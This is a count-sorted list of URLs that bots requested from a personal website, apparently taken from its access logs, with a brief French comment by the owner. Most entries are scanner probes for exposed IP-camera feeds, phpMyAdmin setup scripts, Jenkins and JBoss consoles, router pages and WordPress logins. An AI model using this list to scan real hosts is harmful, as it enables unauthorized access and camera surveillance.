      1 http://check.proxyradar.com/azenv.php?auth=144731846145&a=PSCMN&i=3559912860&p=80
      1 http://check.proxyradar.com/azenv.php?auth=144733041513&a=PSCMN&i=3559912860&p=80
      1 /http://mobile.dvrhost.com/images/capture.php
      1 https://m.baidu.com/
      1 http://www.baidu.com/robots.txt
      1 http://www.google.pl/search?q=praca&num=100&start=100
      1 http://www.wikipedia.org/
      1 http://ya.ru/
      1 /hugesize.jpg?camera=1
      1 /hugesize.jpg?camera=2
      1 /hugesize.jpg?camera=3
      1 /hugesize.push?camera=1
      1 /hugesize.push?camera=2
      1 /hugesize.push?camera=3
      1 /IEIDVR?CH=&CARD=0
      1 /image
      1 /image1
      1 /image/1
      1 /image/1.jpg
      1 /image1.jpg
      1 /image1?res=half&x1=0&y1=0
      1 /image2
      1 /image/2
      1 /image/2.jpg
      1 /image2.jpg
      1 /image2?res=half&x1=0&y1=0
      1 /image3
      1 /image/3
      1 /image/3.jpg
      1 /image3.jpg
      1 /image3?res=half&x1=0&y1=0
      1 /++image?cameraNum=1
      1 /++image?cameraNum=2
      1 /++image?cameraNum=3
      1 /image.cgi
      1 /image.cgi?camera=1
      1 /image.cgi?camera=2
      1 /image.cgi?camera=3
      1 /image.cgi?CAPTURE=YES&STREAM=1&COMMAND=
      1 /image.cgi?img=ch1
      1 /image.cgi?img=ch2
      1 /image.cgi?img=ch3
      1 /image.cgi?resolution=640x480
      1 /image.cgi?type=motion
      1 /image.cgi?type=motion&camera=1
      1 /image.cgi?type=motion&camera=2
      1 /image.cgi?type=motion&camera=3
      1 /IMAGE.JPEG
      1 /image/jpeg.c
      1 /image/jpeg.cgi
      1 /image.jpg
      1 /Image.jpg
      1 /IMAGE.JPG
      1 /image.jpg?size=3
      1 /image.jpg?type=motion
      1 /image.mjpg
      1 /imagep/picture.jpg
      1 /image/qvga.jpg
      1 /image?res=half&x0=0&y0=0&x1=1600&y1=1200&quality=15&doublescan=0&ssn=1340443365044&id=1340443379230
      1 /images1full
      1 /images1sif
      1 /images2full
      1 /images2sif
      1 /images3full
      1 /images3sif
      1 /images/stream_1.jpg
      1 /images/stream_2.jpg
      1 /images/stream_3.jpg
      1 /images/webcam.jpg
      1 /img/getcam
      1 /img.jpg
      1 /img/mjpeg.cgi
      1 /img/mjpeg.jpg
      1 /img/snapshot.cgi
      1 /img/snapshot.cgi?img=vga
      1 /img/snapshot.cgi?size=2
      1 /img/snapshot.cgi?size=3
      1 /img/video.asf
      1 /img/video.cgi?resolution=VGA
      1 /img/video.jpg
      1 /img/video.mjpeg
      1 /invoker/JMXInvokerServlet
      1 /ipcam/avc.cgi?audiostream=1
      1 /ipcam/avc.cgi?audiostream=2
      1 /ipcam/avc.cgi?audiostream=3
      1 /ipcam_h264.sdp
      1 /ipcam/jpeg.cgi
      1 /ipcam/jpegcif.cgi
      1 /ipcam/mjpeg.cgi
      1 /ipcam/mjpeg.cgi?ch=1
      1 /ipcam/mjpeg.cgi?ch=2
      1 /ipcam/mjpeg.cgi?ch=3
      1 /ipcam/mjpegcif.cgi
      1 /ipcam/snapshot.htm
      1 /ipcam/stream.cgi?nowprofileid=1
      1 /ipcam/stream.cgi?nowprofileid=2
      1 /ipcam/stream.cgi?nowprofileid=3
      1 //iphone/11?%3A
      1 /iptv/YS4RHQVF5HUU9K/157/index.m3u8
      1 /ivop.get?action=live&THREAD_ID=
      1 /java.jpg
      1 //java/mjpeg?camera=1&motion=0
      1 //java/mjpeg?camera=2&motion=0
      1 //java/mjpeg?camera=3&motion=0
      1 //javascript/Jpg?Camera=1&motion=1
      1 //javascript/Jpg?Camera=2&motion=1
      1 //javascript/Jpg?Camera=3&motion=1
      1 /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
      1 /joomla/administrator
      1 /Joomla/administrator
      1 /jpeg
      1 /jpeg/1/jpeg.php
      1 /Jpeg/CamImg.jpg
      1 /jpeg.cgi
      1 /jpeg.cgi?1
      1 /jpeg.cgi?2
      1 /jpeg.cgi?3
      1 /jpeg.fcgi?mode=real&si=&mon=1&ch=1&width=640&height=480&quality=7&fps=0
      1 /jpeg.fcgi?mode=real&si=&mon=1&ch=2&width=640&height=480&quality=7&fps=0
      1 /jpeg.fcgi?mode=real&si=&mon=1&ch=3&width=640&height=480&quality=7&fps=0
      1 /jpeg?id=1
      1 /jpeg?id=2
      1 /jpeg?id=3
      1 /Jpeg/Img.jpg
      1 /jpeg/pull
      1 /jpeg/qvga.jpg
      1 /jpeg/vga.jpg
      1 /jpg/1/image.jpg
      1 /jpg/GetData.cgi?Status=0
      1 /jpg/image.cgi?date=1&clock=1&resolution=640x480
      1 /jpg/image.jpg
      1 /jpg/image.jpg?size=3
      1 /jpg/stillimg.jpg
      1 /js/general.js
      1 /jstream.cgi?chid=1&cnt=0
      1 /jstream.cgi?chid=2&cnt=0
      1 /jstream.cgi?chid=3&cnt=0
      1 /Live/1CH/.JPEG
      1 /Live/1CH/.JPG
      1 /Live/2CH/.JPEG
      1 /Live/2CH/.JPG
      1 /Live/3CH/.JPEG
      1 /Live/3CH/.JPG
      1 /live_3gpp.sdp
      1 /live?camera=1&fps=5&quality=75&resolution=640x480
      1 /live?camera=1&framerate=5
      1 /live?camera=1&quality=75&resolution=640x480
      1 /live?camera=2&fps=5&quality=75&resolution=640x480
      1 /live?camera=2&framerate=5
      1 /live?camera=2&quality=75&resolution=640x480
      1 /live?camera=3&fps=5&quality=75&resolution=640x480
      1 /live?camera=3&framerate=5
      1 /live?camera=3&quality=75&resolution=640x480
      1 /live?camera=&quality=75&fps=5&resolution=
      1 /live?camera=&quality=75&resolution=
      1 /live/ch00_0
      1 /live?codec=mjpeg&camera=1
      1 /live?codec=mjpeg&camera=2
      1 /live?codec=mjpeg&camera=3
      1 /live/h264
      1 /live/h264_ulaw
      1 /liveimg.cgi
      1 /liveimg.cgi?ch=1
      1 /liveimg.cgi?ch=2
      1 /liveimg.cgi?ch=3
      1 /liveimg.cgi?serverpush=1
      1 /liveimg.cgi?serverpush=1&jpeg=1&stream=1
      1 /liveimg.cgi?serverpush=1&jpeg=1&stream=2
      1 /liveimg.cgi?serverpush=1&jpeg=1&stream=3
      1 /__live.jpg?_1&_2&
      1 /__live.jpg?1&2&3&4
      1 /live/mjpeg
      1 /live_mpeg4_1.sdp
      1 /live/stream1.cgi
      1 /live/stream2.cgi
      1 /live/stream3.cgi
      1 /loginfree.jpg
      1 /m/
      1 /m/camera1.jpg
      1 /m/camera2.jpg
      1 /m/camera3.jpg
      1 /mchannel/1
      1 /mchannel/2
      1 /mchannel/3
      1 /media/?action=stream
      1 /media/mjpeg.php?multipart=true&id=1
      1 /media/mjpeg.php?multipart=true&id=2
      1 /media/mjpeg.php?multipart=true&id=3
      1 /media/still.jpg
      1 /mjpeg
      1 /mjpeg1?res=half&x1=0&y1=0
      1 /mjpeg2?res=half&x1=0&y1=0
      1 /mjpeg3?res=half&x1=0&y1=0
      1 /mjpeg.cgi
      1 /MJPEG.CGI
      1 /mjpeg.cgi?user=&password=&channel=1
      1 /mjpeg.cgi?user=&password=&channel=1&snapshot=on
      1 /mjpeg.cgi?user=&password=&channel=2
      1 /mjpeg.cgi?user=&password=&channel=2&snapshot=on
      1 /mjpeg.cgi?user=&password=&channel=3
      1 /mjpeg.cgi?user=&password=&channel=3&snapshot=on
      1 /mjpeg.cgi?user=&pwd=&channel=1
      1 /mjpeg.cgi?user=&pwd=&channel=2
      1 /mjpeg.cgi?user=&pwd=&channel=3
      1 /mjpeg?res=full&x0=0&y0=0&x1=100%25&y1=100%25&quality=12&doublescan=0
      1 /mjpegStreamer.cgi
      1 /mjpg/1
      1 /mjpg/1/video.mjpg
      1 /mjpg/2
      1 /mjpg/2/video.mjpg
      1 /mjpg/3
      1 /mjpg/3/video.mjpg
      1 /MJPG.CGI
      1 /mjpg/quad/video.mjpg
      1 /mjpg/video.cgi
      1 /mjpg/video.mjpg
      1 /mobile/
      1 /mobile/channel1.jpg
      1 /mobile/channel2.jpg
      1 /mobile/channel3.jpg
      1 /monitor2.htm
      1 /monitor.cgi?Channel=1&Audio=0000&Live=1
      1 /monitor.cgi?Channel=2&Audio=0000&Live=1
      1 /monitor.cgi?Channel=3&Audio=0000&Live=1
      1 /myadmin/
      1 /MyAdmin/scripts/setup.php
      1 /mysql/
      1 /mysql-admin/
      1 /mysqladmin/
      1 //mysqladmin/scripts/setup.php
      1 /mysqlmanager/
      1 //mysql/scripts/setup.php
      1 /netcam.jpg
      1 /now.jpg
      1 /now.jpg?ds=
      1 /now.jpg?snap=spush
      1 /now.jpg?snap=spush%3Fds%3D
      1 /nph-mjpeg.cgi
      1 /nph-mjpeg.cgi?1
      1 /nph-mjpeg.cgi?2
      1 /nph-mjpeg.cgi?3
      1 /nphMotionJpeg
      1 /nphMotionJpeg?Resolution=320x240&Quality=Motion
      1 /nphMotionJpeg?Resolution=320x240&Quality=Standard
      1 /nphMotionJpeg?Resolution=640x480&Quality=Standard
      1 /nph-zms?mode=jpeg&monitor=1&auth=%7BAUTH%7D
      1 /nph-zms?mode=jpeg&monitor=1&user=&pass=
      1 /nph-zms?mode=jpeg&monitor=2&auth=%7BAUTH%7D
      1 /nph-zms?mode=jpeg&monitor=2&user=&pass=
      1 /nph-zms?mode=jpeg&monitor=3&auth=%7BAUTH%7D
      1 /nph-zms?mode=jpeg&monitor=3&user=&pass=
      1 /nph-zms?mode=single&monitor=1&auth=%7BAUTH%7D
      1 /nph-zms?mode=single&monitor=1&user=&pass=
      1 /nph-zms?mode=single&monitor=2&auth=%7BAUTH%7D
      1 /nph-zms?mode=single&monitor=2&user=&pass=
      1 /nph-zms?mode=single&monitor=3&auth=%7BAUTH%7D
      1 /nph-zms?mode=single&monitor=3&user=&pass=
      1 /nvc-cgi/operator/snapshot.fcgi?channel=1&name=snapshot&resolution=custom&quality=70&width=640&height=480
      1 /nvc-cgi/operator/snapshot.fcgi?channel=2&name=snapshot&resolution=custom&quality=70&width=640&height=480
      1 /nvc-cgi/operator/snapshot.fcgi?channel=3&name=snapshot&resolution=custom&quality=70&width=640&height=480
      1 /oneshotimage1
      1 /oneshotimage2
      1 /oneshotimage3
      1 /oneshotimage.jpg
      1 /open?chn=1+usr%3D+key%3D
      1 /open?chn=2+usr%3D+key%3D
      1 /open?chn=3+usr%3D+key%3D
      1 /operator/get_jpeg.cgi
      1 /operator/get_video.cgi?channel=1&video=0
      1 /op?sid=0+type%3D203+busid%3D0+devid%3D0+chanid%3D1
      1 /op?sid=0+type%3D203+busid%3D0+devid%3D0+chanid%3D2
      1 /op?sid=0+type%3D203+busid%3D0+devid%3D0+chanid%3D3
      1 /out.jpg?id=0.5
      1 //phpadmin/scripts/setup.php
      1 /php-my-admin/
      1 /php-myadmin/
      1 /phpmy-admin/
      1 /phpmyadmin/
      1 /phpMyAdmin/
      1 //phpmyadmin1/scripts/setup.php
      1 /phpmyadmin2/
      1 /phpMyAdmin-2/
      1 /phpMyAdmin2/
      1 //phpMyAdmin-2.5.5/index.php
      1 //phpMyAdmin-2.5.5-pl1/index.php
      1 /phpMyAdmin-2.6.0-rc2/scripts/setup.php
      1 /phpMyAdmin-2.6.1/scripts/setup.php
      1 /phpMyAdmin-2.6.2/scripts/setup.php
      1 /phpMyAdmin-2.8.0-rc2/scripts/setup.php
      1 //phpmyadmin2/scripts/setup.php
      1 //phpMyAdmin-2/scripts/setup.php
      1 /phpMyAdmin/scripts/setup.php
      1 //PHPMyAdmin/scripts/setup.php
      1 /pic01/images.jpg
      1 /pic1-9999.jpg
      1 /pic2-9999.jpg
      1 /pic3-9999.jpg
      1 /PictureCatch.cgi?username=&password=&channel=1
      1 /PictureCatch.cgi?username=&password=&channel=2
      1 /PictureCatch.cgi?username=&password=&channel=3
      1 /p/m/a/
      1 /pma/
      1 /PMA/
      1 /public/video.cgi?ch=1
      1 /public/video.cgi?ch=2
      1 /public/video.cgi?ch=3
      1 /pull.web?1
      1 /pull.web?2
      1 /pull.web?3
      1 /README_FOR_DECRYPT.txt
      1 /record/current.jpg
      1 /record/current.jpg?sync=-99
      1 /redirect.php
      1 /reports/CamImage?height=480&width=640&cam=1&live=&annotate=
      1 /reports/CamImage?height=480&width=640&cam=2&live=&annotate=
      1 /reports/CamImage?height=480&width=640&cam=3&live=&annotate=
      1 /rom-0
      1 /screen.jpg
      1 /screen.mjpg
      1 //scripts/setup.php
      1 /shot.asp
      1 /shot.jpg
      1 /showimg_pda.cgi?cam=1
      1 /showimg_pda.cgi?cam=2
      1 /showimg_pda.cgi?cam=3
      1 /snap
      1 /snap.jpg
      1 /snap.jpg?JpegCam=1
      1 /snap.jpg?JpegCam=2
      1 /snap.jpg?JpegCam=3
      1 /snap.jpg?JpegSize=M
      1 /snap.jpg?JpegSize=XL
      1 /snap.jpg?user=&pwd=
      1 /snap.jpg?user=&pwd=&count=0
      1 /snap.jpg?usr=&pwd=
      1 /snapshot
      1 /snapshot1.jpg
      1 /snapshot2.jpg
      1 /snapshot_3gp.jpg
      1 /snapshot3.jpg
      1 /snapshot.cgi?camera=1
      1 /snapshot.cgi?camera=2
      1 /snapshot.cgi?camera=3
      1 /snapshot.cgi?size=2
      1 /snapshot.cgi?user=&pwd=
      1 /snapshot.cgi?user=&pwd=&count=0
      1 /snapshot.cgi?user=&pwd=&strm=1
      1 /snapshot.cgi?user=&pwd=&strm=2
      1 /snapshot.cgi?user=&pwd=&strm=3
      1 /snapshot.cgi?usr=&pwd=
      1 /snapshot_ch01.jpg
      1 /snapshot_ch02.jpg
      1 /snapshot_ch03.jpg
      1 /snapshot_ch1.jpg
      1 /snapshot_ch2.jpg
      1 /snapshot_ch3.jpg
      1 /snapshot_hq1.jpg
      1 /snapshot_hq2.jpg
      1 /snapshot_hq3.jpg
      1 /snapshot.html
      1 /SnapshotJPEG
      1 /SnapshotJPEG?Resolution=320x240
      1 /snapshot.jpg
      1 /SnapshotJPG
      1 /snapshot.jpg?account=&password=
      1 /SnapShotJPG?Resolution=320x240&Quality=Motion
      1 /snapshot.jpg?user=&pwd=
      1 /snapshot.jpg?user=&pwd=&strm=1
      1 /snapshot.jpg?user=&pwd=&strm=2
      1 /snapshot.jpg?user=&pwd=&strm=3
      1 /snapshot/snapshot.esp?stream=videoport&type=jpeg&channel=1
      1 /snapshot/snapshot.esp?stream=videoport&type=jpeg&channel=2
      1 /snapshot/snapshot.esp?stream=videoport&type=jpeg&channel=3
      1 /snapshot/view1.jpg
      1 /snapshot/view2.jpg
      1 /snapshot/view3.jpg
      1 /special/Cam1.jpg
      1 /special/Cam2.jpg
      1 /special/Cam3.jpg
      1 /sql/
      1 /sqlmanager/
      1 /sqlweb/
      1 /stalker_portal/c/tv.js
      1 /status?full=true
      1 /stillimg1.jpg
      1 /stillimg2.jpg
      1 /stillimg3.jpg
      1 /stillimg.jpg
      1 /still.jpg
      1 /stream1.asf
      1 /stream.asf
      1 /stream.av
      1 /Streaming/channels/1/picture
      1 /Streaming/channels/2/picture
      1 /Streaming/channels/3/picture
      1 /stream.j
      1 /stream.jpg
      1 /stream?uri=video.pro1
      1 /stream?uri=video.pro2
      1 /stream?uri=video.pro3
      1 /temp/image.jpg
      1 <title>phpMyAdmin
      1 /tmpfs/auto.jpg
      1 /tmp/snap.jpg
      1 /treeproxy/cam1.jpg
      1 /treeproxy/cam2.jpg
      1 /treeproxy/cam3.jpg
      1 //typo3/phpmyadmin/scripts/setup.php
      1 /user/cgi-bin/getstream.cgi?10&&&&0&0&0&0&0
      1 /?user=&pwd=
      1 /user/videostream.cgi
      1 /usr/yoics1.jpg
      1 /usr/yoics2.jpg
      1 /usr/yoics3.jpg
      1 /util_gw.js
      1 /vdata.v
      1 /vid.cgi?id=&doc=&nc=0
      1 /video1enc1.mjpg
      1 /video1enc2.mjpg
      1 /video1.mjpg
      1 /video2.mj
      1 /video2.mjpg
      1 /video3.mjpg
      1 /video/cam1/2.0?audio=0&stream=0
      1 /video/cam2/2.0?audio=0&stream=0
      1 /video/cam3/2.0?audio=0&stream=0
      1 /++video?cameraNum=1
      1 /++video?cameraNum=2
      1 /++video?cameraNum=3
      1 /video.cgi
      1 /VIDEO.CGI
      1 /video.cgi?resolution=640x480
      1 /video.cgi?resolution=640x%7BHEIGHT
      1 /video.cgi?resolution=VGA
      1 /videofeed
      1 /video.jpg
      1 /video.jpg?ch=1
      1 /video.jpg?ch=2
      1 /video.jpg?ch=3
      1 /video.mjpeg
      1 /video/mjpg.cgi
      1 /video/mjpg.cgi?profileid=3
      1 /video.mjpg?q=30&fps=33&id=0.5
      1 /video?profile=1
      1 /video?profile=2
      1 /video?profile=3
      1 /video?profile=%7BCHANNEL
      1 /video/pull-1
      1 /video/pull-2
      1 /video/pull-3
      1 /videostream.asf
      1 /videostream.asf?user=%5Badmin%5D&pwd=%5B%5D&resolution=64&rate=0
      1 /videostream.asf?user=&pwd=
      1 /videostream.asf?user=&pwd=&resolution=32
      1 /videostream.asf?user=&pwd=&resolution=32&rate=0
      1 /videostream.asf?user=&pwd=&resolution=640*480
      1 /videostream.asf?user=&pwd=&resolution=640*%7BHEIG
      1 /videostream.asf?user=&pwd=&resolution=640x480
      1 /videostream.asf/user=&pwd=&resolution=640x480
      1 /videostream.asf?user=&pwd=&resolution=64&rate=0
      1 /videostream.asf?usr=&pwd=
      1 /videostream.asf?usr=&pwd=&resolution=640*480
      1 /videostream.cgi?rate=0
      1 /videostream.cgi?rate=0&user=&pwd=
      1 /videostream.cgi?rate=11
      1 /videostream.cgi?resolution=8&rate=
      1 /videostream.cgi?resolution=8&rate=11
      1 /videostream.cgi?resolution=8&rate=13
      1 /videostream.cgi?user=&password=
      1 /videostream.cgi?user=&password=&resolution=32
      1 /videostream.cgi?user=&pwd=
      1 /videostream.cgi?user=&pwd=&resolution=32
      1 /videostream.cgi?user=&pwd=&resolution=32&rate
      1 /videostream.cgi?user=&pwd=&resolution=32&rate=0
      1 /videostream.cgi?usr=&pwd=
      1 /video?submenu=jpg
      1 /video?submenu=mjpg
      1 /view2.cgi?profile=5
      1 /view/camera.cgi?UID=&CH=1
      1 /view/camera.cgi?UID=&CH=2
      1 /view/camera.cgi?UID=&CH=3
      1 /viewdevice.jsp?deviceid=1
      1 /viewdevice.jsp?deviceid=2
      1 /viewdevice.jsp?deviceid=3
      1 /viqcam.mjpg
      1 /webadmin/
      1 /Webcam.jpg
      1 /webclisession/image_req0?camera=1
      1 /webclisession/image_req0?camera=2
      1 /webclisession/image_req0?camera=3
      1 /webdav
      1 /webdb/
      1 //web/phpMyAdmin/scripts/setup.php
      1 //web/scripts/setup.php
      1 /websql/
      1 //websql/scripts/setup.php
      1 /websql/scripts/setup.php
      1 /-wvhttp-01-/GetLiveImage
      1 /-wvhttp-01-/GetOneShot?image_size=640x480
      1 /-wvhttp-01-/GetOneShot?image_size=640x480&frame_count=0
      1 /-wvhttp-01-/GetStillImage
      1 /-wvhttp-01-/video.cgi
      1 \x0F%S\xEE\xF3\xDC|\x00\x00\x18\xC0/\xC0+\xC00\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0"
      1 //xampp/phpmyadmin/scripts/setup.php
      1 /xmlrpc.php
      2 /0
      2 /0.j
      2 /0.jpg
      2 /0/video.cgi
      2 163mx01.mxmail.netease.com:25
      2 /api/mjpegvideo.cgi?InputNumber=1&StreamNumber=0
      2 /?AUDIO=YES&CHOPIMAGE=YES&STREAM=YES&WANTIMAGE=0.JPG&SENDEMPTYIMAGES=NO
      2 /axis-cgi/jpg/image.cgi?date=1&clock=1&camera=0&resolution=640x480
      2 /axis-cgi/mjpg/video.cgi?camera=0
      2 /axis-cgi/mjpg/video.cgi?camera=0&resolution=640x480
      2 /axis-cgi/mjpg/video.cgi?date=1&clock=1&camera=0&resolution=640x480
      2 /blog/wp-login.php
      2 /cam_0.cgi
      2 //cam0.jpg
      2 /cam_0.jpg
      2 /cam0.jpg
      2 /cam0/mjpeg
      2 /camera.jpg?camera=0
      2 /camera.push?camera=0
      2 /?camid=0
      2 /capture0.jpg
      2 /c.cam?cid=0&nocache=1305216470825
      2 /cgi-bin/animate.cgi?0
      2 /cgi-bin/camera?ch=0&resolution=
      2 /cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=&pwd=
      2 /cgi-bin/checkimage.cgi?UID=&CAM=0
      2 /cgi-bin/fullsize.jpg?camera=0&clock=on&motion=0
      2 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x00006784&PortId=0&CameraId=0&PauseTime=0&FwCgiVer=0x0001
      2 /cgi-bin/fwstream.cgi?ServerId=0&AppKey=0x331287e3&CameraId=0&PortId=0&PauseTime=1&FwCgiVer=0x0001
      2 /cgi-bin/getstream.cgi?ch=0&stream_id=0
      2 /cgi-bin/getstream.cgi?VideoType=0
      2 /cgi-bin/guest/Video.cgi?media=JPEG&channel=0
      2 /cgi-bin/halfsize.jpg?camera=0&clock=on&motion=0
      2 /cgi-bin/hugesize.jpg?camera=0&clock=on
      2 /cgi-bin/hugesize.jpg?camera=0&clock=on&motion=0
      2 /cgi-bin/jpeg?connect=start&vmdinfo=none&UID=9&ch=0&resolution=
      2 /cgi-bin/jpeg?session_id=0&buffer=0&prio=high&frame=4
      2 /cgi-bin/jpeg?stream=0
      2 /cgi-bin/jpg.cgi?refresh=0&channel=0&id=&pass=&resolution=640x480&oldbrowser=1
      2 /cgi-bin/jpg/image.cgi
      2 /cgi-bin/mjpeg?session_id=0&buffer=0&prio=high&frame=4
      2 /cgi-bin/mjpeg?stream=0
      2 /cgi-bin/mjpegstream?cam=0
      2 /cgi-bin/mjpegstream?cam=0&single=1
      2 /cgi-bin/mjpg.cgi?name=&password=&cam=0&fun=jpg
      2 /cgi-bin/net_jpeg.cgi?ch=0
      2 /cgi-bin/net_video.cgi?channel=0
      2 /cgi-bin/nph-update_4ch.cgi?ch=0
      2 /cgi-bin/snapshot.cgi?chn=0&u=&p=
      2 /cgi-bin/stream_jpeg.cgi?channel=0&fps=1&multipart=0
      2 /cgi-bin/stream_jpeg.cgi?channel=0&fps=1&multipart=1
      2 /cgi-bin/video0.jpg?size=2&quality=3
      2 /cgi-bin/video.cgi?cam=0&quality=5&size=640x480
      2 /cgi-bin/video.jpg?cam=0&quality=3&size=2
      2 /cgi-bin/video.jpg?cam=0&quality=5&size=640x480
      2 /cgi-bin/view.cgi?chn=0&u=&p=
      2 /cgi-bin/viewer/video.jpg?camera=0&resolution=640x480
      2 /cgi-bin/viewer/video.jpg?channel=0&resolution=640x480
      2 /cgi-bin/viewer/video.jpg?resolution=640x480
      2 /cgi-bin/view/image?pro_0
      2 /cgi-bin/wappaint?camera_no=0&animation=0&name=&password=&pic_size=2
      2 /cgi-bin/webapp.cgi?MODE=8&ID=&PW=&VER=3000&CH=0
      2 /cgi-bin/webproc
      2 /cgi-bin/webra_fcgi.fcgi?api=get_jpeg_raw&chno=0
      2 /cgi/snapshot.cgi?action=getdata&channel.0.capture=true&channel.0.resolution=1
      2 /CH0/oneshotimage.jpg
      2 /Channel0
      2 /cmd=live&codec=mjpeg&ID=0/
      2 /command/image.cgi?grant=User&channelno=0
      2 /current0.jpg
      2 /current0.mjpg
      2 /display_pic.cgi?cam=0&res=hi
      2 /dms?nowprofileid=0
      2 /dsr-cgi/getdsrimage.cgi?camera=0&username=&password=&adfa=1
      2 /fullsize.jpg?camera=0
      2 /fullsize.push?camera=0
      2 /GetData.cgi?CH=0&Codec=jpeg&Size=640x480
      2 /getimage0
      2 /getimage00
      2 /getimage?camera=0&fmt=720p
      2 /getimage?camera=0&fmt=full
      2 /getimage?camera=0&fmt=vga
      2 /GetImage.cgi?CH=0
      2 /getjpeg.cgi?ch0
      2 /GetJPG.cgi?CH=0
      2 /GetStream.cgi?Video=0
      2 /goform/stream?cmd=get&channel=0
      2 /halfsize.jpg?camera=0
      2 http://www.google.pl/search?q=ostro%C5%82%C4%99ka&num=100&start=100
      2 /hugesize.jpg?camera=0
      2 /hugesize.push?camera=0
      2 /image0
      2 /image/0
      2 /image/0.jpg
      2 /image0.jpg
      2 /image0?res=half&x1=0&y1=0
      2 /++image?cameraNum=0
      2 /image.cgi?camera=0
      2 /image.cgi?img=ch0
      2 /image.cgi?type=motion&camera=0
      2 /images0full
      2 /images0sif
      2 /images/stream_0.jpg
      2 /ipcam/avc.cgi?audiostream=0
      2 /ipcam/mjpeg.cgi?ch=0
      2 /ipcam/stream.cgi?nowprofileid=0
      2 /iphone/11?%3A
      2 /ipscnchckpwd
      2 //java/mjpeg?camera=0&motion=0
      2 //javascript/Jpg?Camera=0&motion=1
      2 /jpeg.cgi?0
      2 /jpeg.fcgi?mode=real&si=&mon=1&ch=0&width=640&height=480&quality=7&fps=0
      2 /jpeg?id=0
      2 /jstream.cgi?chid=0&cnt=0
      2 /Live/0CH/.JPEG
      2 /Live/0CH/.JPG
      2 /live?camera=0&fps=5&quality=75&resolution=640x480
      2 /live?camera=0&framerate=5
      2 /live?camera=0&quality=75&resolution=640x480
      2 /live?codec=mjpeg&camera=0
      2 /liveimg.cgi?ch=0
      2 /liveimg.cgi?serverpush=1&jpeg=1&stream=0
      2 /__live.jpg?&
      2 /m/camera0.jpg
      2 /mchannel/0
      2 /media/mjpeg.php?multipart=true&id=0
      2 /mjpeg0?res=half&x1=0&y1=0
      2 /mjpeg.cgi?user=&password=&channel=0
      2 /mjpeg.cgi?user=&password=&channel=0&snapshot=on
      2 /mjpeg.cgi?user=&pwd=&channel=0
      2 /mjpg/0
      2 /mjpg/0/video.mjpg
      2 /mobile/channel0.jpg
      2 /monitor.cgi?Channel=0&Audio=0000&Live=1
      2 /nph-mjpeg.cgi?0
      2 /nph-zms?mode=jpeg&monitor=0&auth=%7BAUTH%7D
      2 /nph-zms?mode=jpeg&monitor=0&user=&pass=
      2 /nph-zms?mode=single&monitor=0&auth=%7BAUTH%7D
      2 /nph-zms?mode=single&monitor=0&user=&pass=
      2 /nvc-cgi/operator/snapshot.fcgi?channel=0&name=snapshot&resolution=custom&quality=70&width=640&height=480
      2 /oneshotimage0
      2 /open?chn=0+usr%3D+key%3D
      2 /op?sid=0+type%3D203+busid%3D0+devid%3D0+chanid%3D0
      2 /pda.cgi?page=image&cam=1
      2 /pda.cgi?page=image&cam=2
      2 /pda.cgi?page=image&cam=3
      2 //php-my-admin/scripts/setup.php
      2 /pic0-9999.jpg
      2 /PictureCatch.cgi?username=&password=&channel=0
      2 /public/video.cgi?ch=0
      2 /pull.web?0
      2 /reports/CamImage?height=480&width=640&cam=0&live=&annotate=
      2 /showimg_pda.cgi?cam=0
      2 /snap.jpg?JpegCam=0
      2 /snapshot0.jpg
      2 /snapshot.cgi
      2 /snapshot.cgi?camera=0
      2 /snapshot.cgi?user=&pwd=&strm=0
      2 /snapshot_ch00.jpg
      2 /snapshot_ch0.jpg
      2 /snapshot_hq0.jpg
      2 /snapshot.jpg?user=&pwd=&strm=0
      2 /snapshot/snapshot.esp?stream=videoport&type=jpeg&channel=0
      2 /snapshot/view0.jpg
      2 /special/Cam0.jpg
      2 /stat
      2 /status
      2 /stillimg0.jpg
      2 /Streaming/channels/0/picture
      2 /stream?uri=video.pro0
      2 /treeproxy/cam0.jpg
      2 /usr/yoics0.jpg
      2 /video0.mjpg
      2 /video/cam0/2.0?audio=0&stream=0
      2 /++video?cameraNum=0
      2 /video.jpg?ch=0
      2 /video.mjpg
      2 /video?profile=0
      2 /video/pull-0
      2 /videostream.cgi
      2 /view/camera.cgi?UID=&CH=0
      2 /viewdevice.jsp?deviceid=0
      2 /webclisession/image_req0?camera=0
      2 /wordpress/wp-login.php
      3 163mx02.mxmail.netease.com:25
      3 /Blog/wp-login.php
      3 /Wordpress/wp-login.php
      3 //wp-login.php
      3 /wp/wp-login.php
      4 163mx03.mxmail.netease.com:25
      4 /hudson/login
      4 /jenkins/login
      4 /pda.cgi?page=image&cam=0
      4 /tmUnblock.cgi
      4 /user/soapCaller.bs
      4 /x
      5 http://51.254.206.142/httptest.php
      5 vip163mx01.mxmail.netease.com:25
      6 http://1111.ip138.com/ic.asp
      6 http://testp2.czar.bielawa.pl/testproxy.php
      6 /hudson/script
      6 //myadmin/scripts/setup.php
      6 //MyAdmin/scripts/setup.php
      6 /phpmyadmin/scripts/setup.php
      6 //pma/scripts/setup.php
      6 vip163mx00.mxmail.netease.com:25
      7 400
      7 /login
      7 /muieblackcat
      8 /phpMyAdmin-4.2.1-all-languages
      8 /phpMyAdmin-4.2.1-english
      8 //phpMyAdmin/scripts/setup.php
      8 /sitemap.xml
      9 http://testp5.mielno.lubin.pl/testproxy.php
      9 /msd1.24.4
      9 /myadmin
      9 /mysqldumper
      9 /MySQLDumper
      9 /phpMyAdmin
      9 //phpmyadmin/scripts/setup.php
     10 http://testp3.pospr.waw.pl/testproxy.php
     10 /jenkins/script
     10 /jmx-console
     10 /msd
     10 /msd1.24stable
     10 /mySqlDumper
     10 /phpmyadmin
     10 proxytest.zmap.io:80
     10 /script
     10 /SQlite/main.php
     10 /SQLiteManager-1.2.4/main.php
     10 /sqlitemanager/main.php
     10 /SQLiteManager/main.php
     11 /sqlite/main.php
     11 /SQLite/SQLiteManager-1.2.4/main.php
     12 http://testp4.pospr.waw.pl/testproxy.php
     13 /clientaccesspolicy.xml
     15 /manager/html
     18 /mysql
     18 /sql
     22 /w00tw00t.at.ISC.SANS.DFind:)

Pfiou, c'est une grosse liste de plus de 1100 urls. Dire que j'obtiens ça en moins d'un mois avec un site à peine référencé !

Le coté intéressant de cette liste, c'est qu'elle permet de voir ce que les bots essayent parfois de faire sur mon serveur.

